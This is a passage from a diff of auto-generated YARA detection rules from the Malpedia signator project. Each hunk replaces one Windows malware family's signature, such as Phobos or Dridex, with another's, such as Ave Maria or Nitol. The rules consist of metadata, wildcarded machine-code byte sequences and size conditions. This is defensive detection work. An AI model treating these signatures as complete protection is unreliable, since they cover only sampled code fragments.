+		7 of them and filesize < 671744
 }
-rule MALPEDIA_Win_Lowkey_Auto : FILE
+rule MALPEDIA_Win_Heyoka_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3f77a0d8-5e74-59a7-b36b-5b8da053f1d8"
+		id = "374fa72e-9fa9-57de-876f-40244ff261b7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lowkey_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heyoka"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.heyoka_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "d5431f0409ef1f2ee256c5cdc4b5f0e543f06b3c2bf47f27531adb7ea173b9db"
+		logic_hash = "3a5efb9930b3bae06b8a8e2c4e2b028b7e1db66cce7d680b56a42e4a7b874053"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98950,32 +99133,32 @@ rule MALPEDIA_Win_Lowkey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8bf2 488d8d70010000 33d2 41b800020000 e8???????? }
-		$sequence_1 = { 83bb7004000002 0f848d010000 83cfff 488d2db7310100 83635000 83632c00 e9???????? }
-		$sequence_2 = { 498bc2 458bf1 48c1f806 488d0df41e0300 4183e23f 4d03f0 }
-		$sequence_3 = { 3b15???????? 7350 488bca 4c8d05c9230300 83e13f 488bc2 }
-		$sequence_4 = { 48898424d0000000 4533c0 488b4708 488bd5 48898424e0000000 }
-		$sequence_5 = { 488b0d???????? 488b5210 488b8900040000 ff15???????? 488b15???????? 4533c0 }
-		$sequence_6 = { 85c0 0f94c3 8bc3 488b4c2478 }
-		$sequence_7 = { 33d2 488bc8 ff15???????? 488d1556260200 }
-		$sequence_8 = { 488bcf e8???????? 488d4df7 e8???????? 488d155cfd0100 488d4df7 e8???????? }
-		$sequence_9 = { 488d15c10d0200 4533c0 48895c2420 488b01 ff5020 488b4c2450 4c8d4de8 }
+		$sequence_0 = { e8???????? ff15???????? b801000000 5d c3 55 8bec }
+		$sequence_1 = { 8b5118 895018 a1???????? 8b4dfc 894818 8b55fc 8915???????? }
+		$sequence_2 = { 0345f8 8a4df1 8848ff 8b55f8 3b550c 7c02 eb02 }
+		$sequence_3 = { 8bec 8b4508 33c9 8a480c 51 8b5508 83c20d }
+		$sequence_4 = { 8b45ec 8945f4 8b4df7 81e1ff000000 51 8b55f6 81e2ff000000 }
+		$sequence_5 = { 8b0d???????? 894df8 683f420f00 6a00 8b15???????? 52 e8???????? }
+		$sequence_6 = { 8bec 81ec18040000 57 c685f0fbffff00 b9ff000000 33c0 8dbdf1fbffff }
+		$sequence_7 = { 8bc3 885d0b c1e808 88450a 0fb6c0 f68061d7011004 }
+		$sequence_8 = { 8b7508 8b06 8945c0 3bc3 7545 8d45c0 50 }
+		$sequence_9 = { 8b5590 83c201 895590 8b4590 3b4510 0f87ab000000 8b4d0c }
 
 	condition:
-		7 of them and filesize < 643072
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Slickshoes_Auto : FILE
+rule MALPEDIA_Win_Nitol_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ad79f63d-1e65-5f60-a723-157797029623"
+		id = "6668ada1-f01c-572c-b281-f0ac4f640b75"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slickshoes_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nitol_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "d52c38b22f881790a505e094420c171449849a1fa94bb94b87565ae649a918cb"
+		logic_hash = "67d30b435253ce01a4470efa2d653d5ffbe45043e37cc62d200042e270ffc2b7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98989,32 +99172,32 @@ rule MALPEDIA_Win_Slickshoes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff3424 5b 81c404000000 31ca 59 e9???????? 5e }
-		$sequence_1 = { ff742404 5b 8f0424 e9???????? 871424 8b2424 e9???????? }
-		$sequence_2 = { e9???????? 890424 e9???????? 8b1c24 81c404000000 01d6 e9???????? }
-		$sequence_3 = { e9???????? 5c 81c5aae2bb7f 8b1424 56 e9???????? 58 }
-		$sequence_4 = { fc 5d e5b4 d070d3 ac 4d f3b694 }
-		$sequence_5 = { 8a12 be00020000 81c61f000000 0017 81ee40000000 89ef b90a000000 }
-		$sequence_6 = { ff3424 ff3424 e9???????? 55 bda9d61ffa 29e8 5d }
-		$sequence_7 = { ff3424 5b 51 890424 89e0 83ec04 893c24 }
-		$sequence_8 = { e9???????? 52 ba3c0d7e47 e9???????? 59 83ec04 891424 }
-		$sequence_9 = { e9???????? 5d 83c104 870c24 8b2424 e9???????? 81ec04000000 }
+		$sequence_0 = { 8d8554ffffff 50 e8???????? 83c420 bffa000000 }
+		$sequence_1 = { 8945e4 51 ff75ec 50 ff7508 ff15???????? }
+		$sequence_2 = { 57 ffd3 45 3bae08010000 7cd6 57 }
+		$sequence_3 = { 896c2434 8d442434 6a04 bd05100000 50 55 }
+		$sequence_4 = { 55 8bec 81ec20020000 c645e0cf c645e185 c645e2cc c645e3c4 }
+		$sequence_5 = { 5b 55 8bec 81ec18050000 56 }
+		$sequence_6 = { 50 e8???????? 83c424 8d8560ffffff 66c745f00200 50 ff15???????? }
+		$sequence_7 = { ff15???????? 85c0 7d16 ff742404 }
+		$sequence_8 = { ffd6 ffb530ffffff 668945d8 ffd6 6800e9a435 }
+		$sequence_9 = { 8a0c3b 880e 46 43 ebf3 43 40 }
 
 	condition:
-		7 of them and filesize < 11198464
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Leouncia_Auto : FILE
+rule MALPEDIA_Win_Thunker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a9724346-fb9d-57ad-b542-cb221faaaa09"
+		id = "c02652c6-959e-5488-b341-ccfb73521f28"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.leouncia_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.thunker_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "82ead8ce3a400451ff3f5916535aebe7ef2cee2e7927624a2fdf32a62ced8582"
+		logic_hash = "8683a109f273456a365b0d0365e46b8d3a1cb330ad7cb852c208d9e170093c6d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99028,32 +99211,32 @@ rule MALPEDIA_Win_Leouncia_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 c644141800 ff15???????? 85c0 7512 ff15???????? 83f805 }
-		$sequence_1 = { 3bf3 7519 8b35???????? 55 }
-		$sequence_2 = { 895c2464 ff15???????? 85c0 7520 }
-		$sequence_3 = { 8dbc247c040000 2bd6 8bca 89542418 8be9 c1e902 f3a5 }
-		$sequence_4 = { 7505 c6440c2820 41 3bc8 7cee 8b842434050000 56 }
-		$sequence_5 = { 50 e8???????? 8d4c2424 51 e8???????? 8b2d???????? 83c410 }
-		$sequence_6 = { e8???????? 8b4c2420 83c40c 889c0c14010000 }
-		$sequence_7 = { 8d542440 8d442450 8d8c24b4040000 52 }
-		$sequence_8 = { 8b0f 52 50 51 6a00 ff15???????? }
-		$sequence_9 = { 89942444040000 8b542434 8bc1 8bf5 }
+		$sequence_0 = { 7505 e9???????? ffb5fcfdffff e8???????? 68???????? 8d8500feffff }
+		$sequence_1 = { e8???????? 8d8500feffff 50 e8???????? 8d8500feffff 50 68???????? }
+		$sequence_2 = { 7417 e9???????? 3de7710000 7433 7c79 }
+		$sequence_3 = { 8d0556412600 8945fc a1???????? 8945e8 8d05a02a2600 8945dc 8365f000 }
+		$sequence_4 = { e8???????? 83c40c 09c0 750d }
+		$sequence_5 = { e8???????? 6a06 53 e8???????? 83c410 eb40 6a04 }
+		$sequence_6 = { 09c0 743b 6a00 6800100000 8d85fceeffff 50 ffb5e0edffff }
+		$sequence_7 = { c6843d00feffff00 09ff 7405 83ffff 7502 eb48 }
+		$sequence_8 = { 83c40c 8d8544edffff 50 e8???????? 8985c4edffff }
+		$sequence_9 = { 89e5 51 56 57 8b7d08 ff750c }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Qaccel_Auto : FILE
+rule MALPEDIA_Win_Ave_Maria_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f1f0f47f-9fac-5c10-a4e8-a1707e10823b"
+		id = "87720f7c-76f1-51d7-aae1-49bd8d947af2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.qaccel_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ave_maria_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "3da505a80435da5e26f3793d381f00e69d927d9829311958eb99f2abec85d62f"
+		logic_hash = "084747828755c63e5e35ddf08ea97436090c1d46b402b58bfe29209faf23a08b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99067,32 +99250,32 @@ rule MALPEDIA_Win_Qaccel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 0f842b010000 8b7d0c 85ff 0f8420010000 8b4d10 85c9 }
-		$sequence_1 = { 0f880a000000 0f8904000000 5f 5f }
-		$sequence_2 = { 41 83c210 894df8 8b1b }
-		$sequence_3 = { ff15???????? 50 ff15???????? 85db 7525 b941000000 }
-		$sequence_4 = { 8bf9 81e1ffff0000 83c102 51 ff15???????? 8bf0 }
-		$sequence_5 = { 8b35???????? 83c408 ffd6 99 b91a000000 }
-		$sequence_6 = { 5f 8b4d24 85c9 740a 8b45e0 }
-		$sequence_7 = { 85c0 0f8439010000 8b55fc 81e2ffff0000 }
-		$sequence_8 = { 5f 8b86f0000000 8b550c 50 52 ff15???????? 83c408 }
-		$sequence_9 = { 83c9ff f2ae f7d1 2bf9 8d95fcfeffff 8bf7 }
+		$sequence_0 = { ff15???????? 33c9 85c0 0f94c1 8bc1 c3 }
+		$sequence_1 = { 8a5716 f6d2 80e201 5f 5e 8ac2 5b }
+		$sequence_2 = { 50 e8???????? 8b37 8bcf e8???????? 50 56 }
+		$sequence_3 = { e8???????? 8d4de8 e8???????? 8b4508 5e c9 c20400 }
+		$sequence_4 = { 8bf0 ba???????? 51 8bce e8???????? ba???????? }
+		$sequence_5 = { 740a 8b45f0 8906 33c0 40 eb02 33c0 }
+		$sequence_6 = { 56 8bf1 ff15???????? 8d8ed8010000 e8???????? 8d4e30 e8???????? }
+		$sequence_7 = { 0f84e0000000 51 ba???????? 8bc8 e8???????? 8b4e10 ba???????? }
+		$sequence_8 = { 8d44240c 56 57 8b7d08 6a00 ff7708 }
+		$sequence_9 = { 03d1 c1cf02 8b4df0 03d3 334dac 8bc7 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Doplugs_Auto : FILE
+rule MALPEDIA_Win_Plaintee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4aa6b45e-3a15-5665-b8ab-574c45e7a423"
+		id = "c56b0cbf-9d5e-5f6b-9ab4-e8b2c0f5e971"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doplugs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doplugs_auto.yar#L1-L105"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.plaintee_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "3a8a777ec93c3f944683664500df734649c491983fb906ea5cefcf412da3de95"
+		logic_hash = "ab35f3cc5b4d32bf6576e8cbf7b0de583ee4e81c86ef4d1d809f91568ce439ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99106,30 +99289,32 @@ rule MALPEDIA_Win_Doplugs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 01fe 21f3 f7d6 21d6 09de }
-		$sequence_1 = { 83e13f c1f806 6bc938 8b0485b0390a10 0fb6440828 83e040 5d }
-		$sequence_2 = { ff15???????? 8b04bdb0390a10 834c0318ff 33c0 eb16 e8???????? c70009000000 }
-		$sequence_3 = { 6bc938 8b0485b0390a10 f644082801 7406 8b440818 5d }
-		$sequence_4 = { 89d3 83e2bf f7d3 83e340 09da }
-		$sequence_5 = { 57 8db8a4350a10 57 ff15???????? ff0d???????? 83ef18 }
-		$sequence_6 = { 31c0 8b4c2414 8b542438 8b521c 29d0 }
-		$sequence_7 = { 8b0c24 89ca 80e1ad f6d2 80e252 08d1 }
+		$sequence_0 = { 83c408 ff15???????? 99 b932000000 8b742410 f7f9 8b4c240c }
+		$sequence_1 = { ffd0 8b4c2400 33c0 83f905 0f94c0 }
+		$sequence_2 = { 7e0f 53 8a1c31 32da }
+		$sequence_3 = { e8???????? 8bf0 eb02 33f6 8bce e8???????? 8a8669010000 }
+		$sequence_4 = { 51 6a00 52 56 50 ff15???????? 83f85a }
+		$sequence_5 = { 8b8d4c010000 83c25a 51 50 }
+		$sequence_6 = { b932000000 8b742410 f7f9 8b4c240c }
+		$sequence_7 = { 6802020000 ff15???????? 85c0 740a b001 }
+		$sequence_8 = { 56 8b74240c 50 8b44240c }
+		$sequence_9 = { 51 8b4c241c 51 ff15???????? }
 
 	condition:
-		7 of them and filesize < 1355776
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Aurastealer_Auto : FILE
+rule MALPEDIA_Win_Rifdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8c36a500-8774-5585-be5e-1badb5bb0481"
+		id = "c64cc60e-de43-57ba-a8c5-3da8fe6ea09a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurastealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aurastealer_auto.yar#L1-L147"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rifdoor_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "8480b12b568e7fb011f2e56db2dfa5eb1d5aeacb4a24d1ba1c2deb0c82ba7d5d"
+		logic_hash = "4a7031572d6960be3c18bec0c177698078092abb2ffc70b93030291dca57dff4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99143,38 +99328,38 @@ rule MALPEDIA_Win_Aurastealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 09f8 894648 83c110 894e44 8b7e30 }
-		$sequence_1 = { 09f9 85d2 0f49c8 89f5 }
-		$sequence_2 = { 09fb 895e48 83c110 894e44 }
-		$sequence_3 = { 09fb 8b0c24 0fb68c0e32900000 01d1 }
-		$sequence_4 = { 0a1c24 751f 8b7920 8b3f }
-		$sequence_5 = { 0a442404 89ee 7456 8b6c2410 }
-		$sequence_6 = { 09fa d1ea 89f7 83e601 }
-		$sequence_7 = { 0a4c2410 751c 6840df0400 6a01 }
-		$sequence_8 = { 01442428 8bf1 13d9 33d2 }
-		$sequence_9 = { 01442420 13d1 c1eb0b 0fa4c115 }
-		$sequence_10 = { 012c18 42 3bd7 72dc }
-		$sequence_11 = { 014c241c 13f0 33d2 89742420 }
-		$sequence_12 = { 014c2420 8be8 13f0 33ff }
-		$sequence_13 = { 0144241c 8b7c2424 136c2414 33c0 }
-		$sequence_14 = { 0128 42 3bd7 72db }
-		$sequence_15 = { 0002 8a0c0f 83c40c 020e }
+		$sequence_0 = { 7404 3bc3 7508 c744242401000000 8d4c2410 }
+		$sequence_1 = { 895c2410 8d442410 50 b808000000 b9???????? e8???????? }
+		$sequence_2 = { 56 bf12000000 e8???????? 83c404 }
+		$sequence_3 = { c1e006 03048d605d4100 eb05 b8???????? }
+		$sequence_4 = { 8b4c2408 51 ff15???????? 5f 83c408 c3 }
+		$sequence_5 = { 6a00 6a12 8d54240c 52 50 }
+		$sequence_6 = { 85c0 7518 5e 8b8c2404010000 33cc e8???????? 81c408010000 }
+		$sequence_7 = { 7d0e 885c301c 017e5c 8b465c 3bc1 }
+		$sequence_8 = { 80bd98feffff00 8d8598feffff 740d 8bc8 }
+		$sequence_9 = { c1eb10 22d3 8bde 8bc8 }
+		$sequence_10 = { 03c2 8b9540fbffff 89853cfbffff 52 8d8544fbffff }
+		$sequence_11 = { 8bec 53 56 8b35???????? 57 3b35???????? 7d4a }
+		$sequence_12 = { ff15???????? 85c0 0f85cf000000 803d????????00 b8???????? }
+		$sequence_13 = { 5d c3 6a04 8d45dc 50 6a08 }
+		$sequence_14 = { 33c0 898540bdffff 898544bdffff 898548bdffff 89854cbdffff 8b8558bdffff }
+		$sequence_15 = { ff15???????? 8d85e8fbffff 50 8bc8 51 ff15???????? e9???????? }
 
 	condition:
-		7 of them and filesize < 1918976
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Phobos_Auto : FILE
+rule MALPEDIA_Win_Ratankba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6caf5a5b-e4a8-5ad7-ac96-0781f61cb33b"
+		id = "6a3f1f15-dacb-52cd-b11b-5a08568d4510"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phobos_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ratankba_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "0813fe2e377724ce620e3c3620ed6e847086eab6c4f49515372897489c1a64d4"
+		logic_hash = "245ded0bb432e91f4a3aadcb5c1a265abfb5f2ea6a66bf5a1e4eebc1e9edd031"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99188,32 +99373,32 @@ rule MALPEDIA_Win_Phobos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4f ff75fc e8???????? 59 8bc7 5f 5e }
-		$sequence_1 = { 6a0c 5b 53 8d442430 56 50 e8???????? }
-		$sequence_2 = { 7446 8b06 85c0 7440 8b0f 894e04 8b4f04 }
-		$sequence_3 = { 33db 56 57 33c0 895c2428 8d7c242c ab }
-		$sequence_4 = { 8bc6 8d3c08 8d8fb2000000 894df4 83c118 2bc8 81c100000400 }
-		$sequence_5 = { 5b c9 c3 56 6a1c }
-		$sequence_6 = { 83c002 eb02 8bc7 8bc8 56 8d7102 }
-		$sequence_7 = { 68ff000000 ff15???????? cc 55 8bec 8b4508 a3???????? }
-		$sequence_8 = { 0f8452010000 3bf7 7420 8d44243c 50 ff15???????? 50 }
-		$sequence_9 = { ff7708 8d442430 ff7704 ff37 50 56 e8???????? }
+		$sequence_0 = { 8b17 8d0c8500000000 51 6a00 52 e8???????? 8b06 }
+		$sequence_1 = { c745fcffffffff 899edc000000 899ee0000000 39bdd0d5ffff 720f 8b8dbcd5ffff 51 }
+		$sequence_2 = { 8d8db4feffff 53 51 c785b4feffff00000000 e8???????? 8bd8 }
+		$sequence_3 = { 751b 8b45f8 3bc3 7409 50 e8???????? 83c404 }
+		$sequence_4 = { 8b9510ffffff 85f6 744d 8b8ddcfeffff bb10000000 395914 7202 }
+		$sequence_5 = { 8b5304 6a18 8944ca04 e8???????? 8bf0 85f6 0f8837ffffff }
+		$sequence_6 = { e8???????? 8b5004 8b45e4 8b4cd004 51 e8???????? }
+		$sequence_7 = { 8986b8010000 8986bc010000 899eb0010000 c786b401000060ea0000 8bc6 8b4df4 }
+		$sequence_8 = { 48 3bc7 7224 b857000780 e8???????? 8bc7 e8???????? }
+		$sequence_9 = { 83c404 898394000000 85c0 0f847d000000 8b8d10efffff 51 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Minitypeframe_Auto : FILE
+rule MALPEDIA_Win_Blind_Edr_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dc23eb24-7d5a-5aeb-a61b-eb29d1fabf92"
+		id = "763f7b33-d005-5632-bc6e-32cbbb43afd8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minitypeframe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.minitypeframe_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blind_edr"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blind_edr_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "649cd851124eccf39a4d1794ac9ee18b8f663aea1274862230eac021ea9eebf8"
+		logic_hash = "af78d8eedd7874fd051e4e2d0675f6cbdce3ecade2c26f196e0f08521ce6dfb2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -99227,34 +99412,34 @@ rule MALPEDIA_Win_Minitypeframe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 6a0c 6a05 f3a4 e8???????? 8b8dd8000000 8d442430 }
-		$sequence_1 = { 83c414 85c0 750a 68bf080000 e9???????? 8b563c 8b7a04 }
-		$sequence_2 = { 8b4c2444 8039a6 0f8504010000 894c2464 8d4c2420 50 8d542420 }
-		$sequence_3 = { 8b1c9d78060910 81e300ff0000 33fb 8bda c1eb18 8b1c9d780e0910 81e3000000ff }
-		$sequence_4 = { e8???????? 83c40c 85c0 751a 6a4b 68???????? }
-		$sequence_5 = { 83c408 e9???????? 668b15???????? 66c744245c0200 52 ff15???????? 8d4c245c }
-		$sequence_6 = { c644240416 884c2405 c6442406ba c644240708 c644240898 c644240958 c644240ac1 }
-		$sequence_7 = { 51 52 e8???????? 8d442414 6a08 }
-		$sequence_8 = { 6854050000 68???????? 6a44 689b000000 6a14 e8???????? 83c418 }
-		$sequence_9 = { e8???????? 8bf8 83c404 3bfb 0f8e07020000 c74634d0210000 895e44 }
+		$sequence_0 = { 488bcf e8???????? 488bc5 e9???????? 498b6e18 488bcf e8???????? }
+		$sequence_1 = { 483b442468 75d7 85db 7e58 }
+		$sequence_2 = { 498b84ffe0fc0100 90 493bc6 0f84ae000000 4885c0 0f85a7000000 4d3bc1 }
+		$sequence_3 = { 488d8c24b0000000 41b808000000 488bd3 e8???????? 4883c308 4883ef01 0f8560ffffff }
+		$sequence_4 = { 488d542450 4533c9 41b802000000 488d4b02 e8???????? 6639742450 747a }
+		$sequence_5 = { 488d4b10 4533c9 41b808000000 488d542448 }
+		$sequence_6 = { 745e 4883c108 4c89b424a8000000 4533c9 488d9424a8000000 }
+		$sequence_7 = { 4883ec20 488bda 4c8d0d20fd0000 8bf9 488d1517fd0000 }
+		$sequence_8 = { e8???????? 4533c9 4c89742460 41b808000000 }
+		$sequence_9 = { 4c8d0503fd0000 e8???????? 488bd3 8bcf 4885c0 7408 ff15???????? }
 
 	condition:
-		7 of them and filesize < 1589248
+		7 of them and filesize < 299008
 }
-rule MALPEDIA_Win_Dridex_Auto : FILE
+rule MALPEDIA_Win_Komprogo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "144cf75b-1d98-530d-8c7f-b36a158181d3"
+		id = "b83eddfd-6609-5160-bb17-24d52dab0572"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dridex_auto.yar#L1-L1103"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.komprogo_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "ed79935f1e181816ce095f2b34e8302b3ab4d9435988ec01dc1b779e29264775"
+		logic_hash = "5f20beca4c5ecafddf1c339febd8122f816667a260edfabf9768a16c874c78f2"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -99266,156 +99451,32 @@ rule MALPEDIA_Win_Dridex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd6 85c0 7512 e8???????? eb03 }
-		$sequence_1 = { e8???????? b910270000 e8???????? e8???????? }
-		$sequence_2 = { c605????????01 c3 c605????????00 c3 }
-		$sequence_3 = { 83f8ff 7505 e8???????? 3d34270000 }
-		$sequence_4 = { ffd0 e8???????? 85c0 74de }
-		$sequence_5 = { ffd0 85c0 751f e8???????? }
-		$sequence_6 = { 740c b9e8030000 e8???????? b301 }
-		$sequence_7 = { 53 53 53 6a01 53 ffd0 }
-		$sequence_8 = { eb0a e8???????? eb03 6a7f }
-		$sequence_9 = { c3 31c0 c3 50 }
-		$sequence_10 = { e8???????? 85c0 7407 56 ffd0 }
-		$sequence_11 = { 807c241400 7409 8d4c2410 e8???????? }
-		$sequence_12 = { e8???????? 6880000000 53 53 }
-		$sequence_13 = { e8???????? 85c0 7408 6a00 ffd0 }
-		$sequence_14 = { 85c0 7407 685a040000 ffd0 }
-		$sequence_15 = { e8???????? 85c0 7404 6a7f }
-		$sequence_16 = { e8???????? 3db20d7897 7508 c70350000000 eb0d 3da665f63e 7506 }
-		$sequence_17 = { ffd0 5b c3 33c0 }
-		$sequence_18 = { e8???????? 6a00 8d4e1c e8???????? }
-		$sequence_19 = { e8???????? eb0a b9d0070000 e8???????? }
-		$sequence_20 = { e8???????? 6a29 8bc8 e8???????? }
-		$sequence_21 = { 7411 c7461003000000 e8???????? 894614 }
-		$sequence_22 = { e8???????? 8d4dc4 e8???????? 5e }
-		$sequence_23 = { 85c0 7415 6a01 6a00 6a00 }
-		$sequence_24 = { 8bc8 e8???????? 6a74 8bc8 e8???????? 6a70 }
-		$sequence_25 = { 6a70 8bc8 e8???????? 6a73 8bc8 e8???????? }
-		$sequence_26 = { eb08 83ca20 eb03 83ca10 }
-		$sequence_27 = { 6a00 8bcf e8???????? 50 ffd6 }
-		$sequence_28 = { e8???????? e9???????? 807c245000 740a }
-		$sequence_29 = { 46 e8???????? c1e802 3bf0 }
-		$sequence_30 = { 6a00 6a00 8d4dfc 51 6aff }
-		$sequence_31 = { 890424 894c2404 75dd 8b0424 }
-		$sequence_32 = { 89c1 8b442424 88c2 8854240f }
-		$sequence_33 = { 8b442428 6689c1 66894c2458 66894c245a }
-		$sequence_34 = { 6a64 59 e8???????? 33c9 }
-		$sequence_35 = { 33c0 803900 7411 ffc0 }
-		$sequence_36 = { c7461002000000 eb0f c7461003000000 e8???????? }
-		$sequence_37 = { 8a442427 a801 7534 eb00 31c0 }
-		$sequence_38 = { 7414 31c0 89c1 8b442424 }
-		$sequence_39 = { eb0a b988130000 e8???????? 33d2 }
-		$sequence_40 = { 85c0 7406 6a02 ff36 ffd0 }
-		$sequence_41 = { 6802100000 68ffff0000 ff36 ffd0 }
